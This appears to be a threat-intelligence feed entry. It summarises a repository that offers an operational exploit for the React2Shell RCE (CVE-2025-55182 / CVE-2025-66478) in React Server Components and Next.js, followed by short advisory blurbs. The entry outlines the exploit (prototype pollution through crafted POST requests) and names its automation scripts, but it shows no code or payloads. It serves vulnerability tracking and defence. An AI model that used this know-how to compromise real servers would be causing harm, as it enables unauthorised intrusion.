This repository provides a comprehensive educational and operational exploit for CVE-2025-55182 / CVE-2025-66478, a critical unauthenticated RCE in React Server Components and Next.js (16.0.6, React 19.x). The exploit leverages a missing hasOwnProperty check in the React Flight protocol deserializer, allowing prototype pollution and arbitrary code execution via crafted HTTP POST requests. The main exploit scripts are 'exploit_educational.sh' (detailed, with step-by-step explanations and detection) and 'quick_exploit.sh' (automated exploitation and flag extraction). The repository also includes extensive documentation (README.md, TEAM_LEARNING_GUIDE.md) explaining the vulnerability, exploitation chain, and mitigation. The exploit is operational, providing both detection and full RCE capabilities, and is designed for educational and authorized security testing purposes. No hardcoded IPs or domains are present; the scripts require the user to specify the target URL. The main attack vector is network-based, targeting HTTP endpoints exposed by vulnerable Next.js/React servers.
Recent activity
228 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A remote code execution vulnerability explicitly listed as one of the flaws preferred by the threat actors for compromising targets.
A separate tracking CVE assigned to Next.js due to its downstream exposure to the React2Shell flaw.
A critical (CVSS 10.0) React Server Components / Next.js-related vulnerability enabling unauthenticated remote code execution under default configurations.
A Next.js vulnerability discussed alongside React2Shell that can lead to arbitrary JavaScript execution on the server and OS command execution.